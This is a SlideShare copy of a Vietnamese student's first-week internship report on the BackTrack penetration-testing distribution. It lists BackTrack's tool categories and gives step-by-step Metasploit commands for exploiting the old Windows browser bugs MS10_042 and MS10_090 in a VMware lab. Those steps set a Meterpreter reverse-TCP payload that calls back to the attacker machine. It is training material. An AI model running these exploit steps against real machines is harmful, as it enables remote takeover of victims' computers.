SlideShare a Scribd company logo
1 of 3
Họ Tên: Đỗ Liên Hán
Trường: Đại Học Quốc Tế
Báo Cáo Tuần 1
Chủ đề: Nghiên Cứu về các chức năng của backtrack để
kiểm tra an ninh mạng.
Các Vấn Đề Của Tuần Thứ 1:
1. Nhận tài liệu và gặp giáo viên hướng dẫn
2. Cài đặt backtrack 5r3
3. Thực hành làm quen với backtrack qua 2 lỗi MS10_090
và MS10_042
I. Backtrack là gì?
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm
thâm nhập. Trong các định dạng Live DVD, có thể sử dụng Backtrack trực tiếp từ DVD
hoặc cài đặt trên máy và sử dụng như một hệ điều hành. Backtrack hỗ trợ một cách nhanh
chóng cho việc tìm kiếm và cập nhật cơ sở dữ liệu các công cụ bảo mật. Backtrack có lịch
sử phát triển qua nhiều bản Linux khác nhau (phiên bản hiện nay sử dụng bản phân phối
Slackware Linux) và liên tục cập nhập các công cụ, drivers qua các phiên bản… Công cụ
kiểm thử bảo mật trong Backtrack có thể được phân loại thành các nhóm như sau:
Information gathering: Sử dụng để có được thông tin liên quan đến một mục tiêu DNS, địa
chỉ email, trang web, máy chủ mail….
Network mapping: Quét thăm dò, bao gồm việc kiểm tra các host đang tồn tại, thông tin về
hệ điều hành, ứng dụng được sử dụng bởi mục tiêu….
Vulnerability identification: Quét các lỗ hổng, phân tích Server Message Block (SMB) và
Simple Network Management Protocol (SNMP).
Web application analysis: Theo dõi, giám sát các ứng dụng web.
Radio network analysis: Kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến
(RFID).
Penetration: Khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu.
Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục
tiêu, các công cụ trong loại này có thể sử dụng để leo thang đặc quyền.
Maintaining access: Duy trì quyền truy cập vào các máy tính mục tiêu. Những đặc quyền
cao nhất là điều kiện cần thiết trước khi có thể cài đặt công cụ để duy trì quyền truy cập.
Voice Over IP (VOIP): Các công cụ để phân tích VOIP.
Digital forensics: Phân tích hình ảnh đĩa cứng, cấu trúc các tập tincó thể chọn Start
Backtrack Forensics trong trình đơn khởi động.
Reverse engineering: Gỡ rối chương trình hoặc tháo rời tập tin thực thi.
II. Các bước thực hiện lỗi MS10_042 và MS10_090:
a. Lỗi MS10_042:
1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP.
2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh msfconsole.
3. Sau đó dung lệnh search ms10_042 đễ tìm kiếm module.
4. Kế tiếp dùng lệnh use
exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec.
5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần
thiết cho mã lỗi.
6. Thiết lập các thông tin cần thiết như:
(1) Set srvhost [IP của máy backtrack]
(2) Set lhost [IP của máy backtrack]
(3) Set payload windows/meterpreter/reverse_tcp
7. Dùng lệnh exploit để triển khai.
8. Sau cùng là chờ máy nạn nhân truy cập vào địa chỉ đã exploit.
b. Lỗi MS10_090:
1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP.
2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh msfconsole.
3. Sau đó dung lệnh search ms10_090 đễ tìm kiếm module.
4. Kế tiếp dùng lệnh use exploit/windows/browser/ms10_090_ie_css_clip.
5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần
thiết cho mã lỗi.
6. Thiết lập các thông tin cần thiết như:
(1) Set srvhost [IP của máy backtrack]
(2) Set lhost [IP của máy backtrack]
(3) Set payload windows/meterpreter/reverse_tcp
7. Dùng lệnh exploit để triển khai.
8. Sau cùng là chờ máy nạn nhân truy cập vào đường dẫn đã exploit.
Demo cho 2 lỗi trên tại link:
MS10_042 ở tại trang: http://youtu.be/Vk5697U2dMg
MS10_090 ở tại trang: http://youtu.be/t3rewc4tcCw

More Related Content

What's hot

Security Bootcamp 2013 - Tấn công bằng mã độc - Trương Minh Nhật Quang
Security Bootcamp 2013 -  Tấn công bằng mã độc - Trương Minh Nhật QuangSecurity Bootcamp 2013 -  Tấn công bằng mã độc - Trương Minh Nhật Quang
Security Bootcamp 2013 - Tấn công bằng mã độc - Trương Minh Nhật QuangSecurity Bootcamp
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System HackingHuynh Khang
 
Slide báo cáo
Slide báo cáoSlide báo cáo
Slide báo cáoblue_abc
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaCon Ranh
 
Beezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo
 
XXE injection - Nguyễn Tăng Hưng
XXE injection - Nguyễn Tăng HưngXXE injection - Nguyễn Tăng Hưng
XXE injection - Nguyễn Tăng HưngVõ Thái Lâm
 
Tuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingTuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingv7q3t
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaÂu Dương Bình
 
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)Huy Tiến
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hackingHuynh Khang
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linuxHường Tô
 
Xâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetXâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetthach28
 

What's hot (19)

Security Bootcamp 2013 - Tấn công bằng mã độc - Trương Minh Nhật Quang
Security Bootcamp 2013 -  Tấn công bằng mã độc - Trương Minh Nhật QuangSecurity Bootcamp 2013 -  Tấn công bằng mã độc - Trương Minh Nhật Quang
Security Bootcamp 2013 - Tấn công bằng mã độc - Trương Minh Nhật Quang
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System Hacking
 
Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2
 
Slide báo cáo
Slide báo cáoSlide báo cáo
Slide báo cáo
 
Botnet slide
Botnet slideBotnet slide
Botnet slide
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athena
 
Beezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke Deserialize
 
XXE injection - Nguyễn Tăng Hưng
XXE injection - Nguyễn Tăng HưngXXE injection - Nguyễn Tăng Hưng
XXE injection - Nguyễn Tăng Hưng
 
1
11
1
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
Tuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingTuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hacking
 
Kali linux
Kali linuxKali linux
Kali linux
 
Bc athena cuoi ky
Bc athena cuoi kyBc athena cuoi ky
Bc athena cuoi ky
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
 
Bao caocuoiki
Bao caocuoikiBao caocuoiki
Bao caocuoiki
 
Loi baomat windows(f)
Loi baomat windows(f)Loi baomat windows(f)
Loi baomat windows(f)
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hacking
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linux
 
Xâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetXâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internet
 

Viewers also liked

อุปกรณ์เชื่อมต่อคอมพิวเตอร์
อุปกรณ์เชื่อมต่อคอมพิวเตอร์อุปกรณ์เชื่อมต่อคอมพิวเตอร์
อุปกรณ์เชื่อมต่อคอมพิวเตอร์neykul
 
İNSAN KAYNAKLARI YÖNETİMİNDE KULLANILAN BİLGİ TEKNOLOJİLERİNİN İNSAN KAYNAKLA...
İNSAN KAYNAKLARI YÖNETİMİNDE KULLANILAN BİLGİ TEKNOLOJİLERİNİN İNSAN KAYNAKLA...İNSAN KAYNAKLARI YÖNETİMİNDE KULLANILAN BİLGİ TEKNOLOJİLERİNİN İNSAN KAYNAKLA...
İNSAN KAYNAKLARI YÖNETİMİNDE KULLANILAN BİLGİ TEKNOLOJİLERİNİN İNSAN KAYNAKLA...cgoze
 
ÖNCEL AKADEMİ: ÖZEL KONULAR
ÖNCEL AKADEMİ: ÖZEL KONULARÖNCEL AKADEMİ: ÖZEL KONULAR
ÖNCEL AKADEMİ: ÖZEL KONULARAli Osman Öncel
 
ÖNCEL AKADEMİ: RAMAZAN BAYRAMI
ÖNCEL AKADEMİ: RAMAZAN BAYRAMIÖNCEL AKADEMİ: RAMAZAN BAYRAMI
ÖNCEL AKADEMİ: RAMAZAN BAYRAMIAli Osman Öncel
 

Viewers also liked (6)

อุปกรณ์เชื่อมต่อคอมพิวเตอร์
อุปกรณ์เชื่อมต่อคอมพิวเตอร์อุปกรณ์เชื่อมต่อคอมพิวเตอร์
อุปกรณ์เชื่อมต่อคอมพิวเตอร์
 
Wow this warm state
Wow this warm stateWow this warm state
Wow this warm state
 
Referans Mektubu Nedir?
Referans Mektubu Nedir?Referans Mektubu Nedir?
Referans Mektubu Nedir?
 
İNSAN KAYNAKLARI YÖNETİMİNDE KULLANILAN BİLGİ TEKNOLOJİLERİNİN İNSAN KAYNAKLA...
İNSAN KAYNAKLARI YÖNETİMİNDE KULLANILAN BİLGİ TEKNOLOJİLERİNİN İNSAN KAYNAKLA...İNSAN KAYNAKLARI YÖNETİMİNDE KULLANILAN BİLGİ TEKNOLOJİLERİNİN İNSAN KAYNAKLA...
İNSAN KAYNAKLARI YÖNETİMİNDE KULLANILAN BİLGİ TEKNOLOJİLERİNİN İNSAN KAYNAKLA...
 
ÖNCEL AKADEMİ: ÖZEL KONULAR
ÖNCEL AKADEMİ: ÖZEL KONULARÖNCEL AKADEMİ: ÖZEL KONULAR
ÖNCEL AKADEMİ: ÖZEL KONULAR
 
ÖNCEL AKADEMİ: RAMAZAN BAYRAMI
ÖNCEL AKADEMİ: RAMAZAN BAYRAMIÖNCEL AKADEMİ: RAMAZAN BAYRAMI
ÖNCEL AKADEMİ: RAMAZAN BAYRAMI
 

Similar to Report athena week 1

Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap   nguyen hoai huyBao cao thuc tap   nguyen hoai huy
Bao cao thuc tap nguyen hoai huyhoaihuysc
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctapLong Prồ
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananhVũ Anh
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2Con Ranh
 
SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1Con Ranh
 
Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1Anhh Hữu
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananhVũ Anh
 
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnTÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnThái Tuấn Lưu
 
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýBáo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýQuý Đồng Nast
 
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýTổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýQuý Đồng Nast
 
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTBài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTMasterCode.vn
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲkakawpah0911
 
INT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfINT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfPhamTruongGiang4
 
cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploitLê Lãnh
 
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdffile_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdfBcNguynQuang1
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲphanconghien
 

Similar to Report athena week 1 (20)

Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap   nguyen hoai huyBao cao thuc tap   nguyen hoai huy
Bao cao thuc tap nguyen hoai huy
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctap
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2
 
SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1
 
Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
Bai bao cao 3
Bai bao cao 3Bai bao cao 3
Bai bao cao 3
 
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnTÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýBáo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
 
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýTổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
 
Tuan 3
Tuan 3Tuan 3
Tuan 3
 
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTBài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
 
INT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfINT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdf
 
cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploit
 
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdffile_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
 
Tuan5
Tuan5Tuan5
Tuan5
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
 

Report athena week 1

  • 1. Họ Tên: Đỗ Liên Hán Trường: Đại Học Quốc Tế Báo Cáo Tuần 1 Chủ đề: Nghiên Cứu về các chức năng của backtrack để kiểm tra an ninh mạng. Các Vấn Đề Của Tuần Thứ 1: 1. Nhận tài liệu và gặp giáo viên hướng dẫn 2. Cài đặt backtrack 5r3 3. Thực hành làm quen với backtrack qua 2 lỗi MS10_090 và MS10_042
  • 2. I. Backtrack là gì? Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm thâm nhập. Trong các định dạng Live DVD, có thể sử dụng Backtrack trực tiếp từ DVD hoặc cài đặt trên máy và sử dụng như một hệ điều hành. Backtrack hỗ trợ một cách nhanh chóng cho việc tìm kiếm và cập nhật cơ sở dữ liệu các công cụ bảo mật. Backtrack có lịch sử phát triển qua nhiều bản Linux khác nhau (phiên bản hiện nay sử dụng bản phân phối Slackware Linux) và liên tục cập nhập các công cụ, drivers qua các phiên bản… Công cụ kiểm thử bảo mật trong Backtrack có thể được phân loại thành các nhóm như sau: Information gathering: Sử dụng để có được thông tin liên quan đến một mục tiêu DNS, địa chỉ email, trang web, máy chủ mail…. Network mapping: Quét thăm dò, bao gồm việc kiểm tra các host đang tồn tại, thông tin về hệ điều hành, ứng dụng được sử dụng bởi mục tiêu…. Vulnerability identification: Quét các lỗ hổng, phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP). Web application analysis: Theo dõi, giám sát các ứng dụng web. Radio network analysis: Kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID). Penetration: Khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu. Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, các công cụ trong loại này có thể sử dụng để leo thang đặc quyền. Maintaining access: Duy trì quyền truy cập vào các máy tính mục tiêu. Những đặc quyền cao nhất là điều kiện cần thiết trước khi có thể cài đặt công cụ để duy trì quyền truy cập. Voice Over IP (VOIP): Các công cụ để phân tích VOIP. Digital forensics: Phân tích hình ảnh đĩa cứng, cấu trúc các tập tincó thể chọn Start Backtrack Forensics trong trình đơn khởi động. Reverse engineering: Gỡ rối chương trình hoặc tháo rời tập tin thực thi.
  • 3. II. Các bước thực hiện lỗi MS10_042 và MS10_090: a. Lỗi MS10_042: 1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP. 2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh msfconsole. 3. Sau đó dung lệnh search ms10_042 đễ tìm kiếm module. 4. Kế tiếp dùng lệnh use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec. 5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần thiết cho mã lỗi. 6. Thiết lập các thông tin cần thiết như: (1) Set srvhost [IP của máy backtrack] (2) Set lhost [IP của máy backtrack] (3) Set payload windows/meterpreter/reverse_tcp 7. Dùng lệnh exploit để triển khai. 8. Sau cùng là chờ máy nạn nhân truy cập vào địa chỉ đã exploit. b. Lỗi MS10_090: 1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP. 2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh msfconsole. 3. Sau đó dung lệnh search ms10_090 đễ tìm kiếm module. 4. Kế tiếp dùng lệnh use exploit/windows/browser/ms10_090_ie_css_clip. 5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần thiết cho mã lỗi. 6. Thiết lập các thông tin cần thiết như: (1) Set srvhost [IP của máy backtrack] (2) Set lhost [IP của máy backtrack] (3) Set payload windows/meterpreter/reverse_tcp 7. Dùng lệnh exploit để triển khai. 8. Sau cùng là chờ máy nạn nhân truy cập vào đường dẫn đã exploit. Demo cho 2 lỗi trên tại link: MS10_042 ở tại trang: http://youtu.be/Vk5697U2dMg MS10_090 ở tại trang: http://youtu.be/t3rewc4tcCw